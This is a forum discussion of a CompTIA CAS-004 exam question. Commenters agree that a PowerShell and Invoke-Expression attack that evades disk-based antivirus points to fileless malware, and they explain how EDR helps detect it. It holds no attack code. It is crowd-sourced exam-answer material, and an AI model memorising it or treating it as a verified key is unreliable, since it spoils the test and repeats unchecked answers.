Exam CAS-004 topic 1 question 105 discussion

Characteristics: Fileless malware does not write any files to disk. Instead, it resides in memory and uses legitimate system tools (such as PowerShell) to execute malicious activities. Behavior: Since it operates in memory, it can evade traditional antivirus solutions that rely on scanning files on disk. This type of malware often leverages built-in tools like PowerShell to download and execute malicious scripts directly from the internet. Detection and Protection: Protecting against fileless malware typically involves using endpoint detection and response (EDR) tools, advanced threat protection solutions, and monitoring for unusual behavior and use of system tools.

The use of PowerShell and the Invoke-Expression function indicates that the attack is leveraging the scripting capabilities within the system, which is a hallmark of fileless malware. The absence of Indicators of Compromise (IOCs) on disk, despite scanning with an antivirus, suggests that the malware might be operating in memory or using fileless techniques.

Antivirus Software is signature-based and scans when the data is at rest or accessed. Logic bombs, rootkits, and Worms reside on the filesystem. Fileless means it is volatile, temporary, and exists in the RAM. Source: Verifying each answer against Chat GPT, my experience, other test banks, a written book, and weighing in the discussion from all users to create a 100% accurate guide for myself before I take the exam. (It isn't easy because of the time needed, but it is doing my diligence)

C. Fileless A fileless malware attack involves malware that operates in memory, instead of writing files to the hard drive, making it more challenging to detect with traditional antivirus solutions. This type of malware can use legitimate scripting languages (like PowerShell) and tools native to the operating system to execute malicious activities, which seems to match the situation described in the question. Worms (A) are a type of malware that spread across networks, typically without user intervention. Logic bombs (B) are malicious payloads that are triggered by a specific event. Rootkits (D) are malware that provide privileged (root-level) access to a computer while hiding their presence. While any of these could theoretically use fileless techniques, the specific focus on PowerShell and the failure of disk scanning to find Indicators of Compromise (IOCs) suggest fileless malware is the most accurate answer.

The description of the attack suggests that the type of malware the solution should protect against is Fileless malware. Therefore, the correct option is C.

C is the correct answer

Fileless malware is a type of malicious activity that uses native, legitimate tools built into a system to execute a cyber attack.

fileless is the right answer

key point is that used PowerShell and it was not found by antivirus so uses exploit https://www.crowdstrike.com/cybersecurity-101/malware/fileless-malware/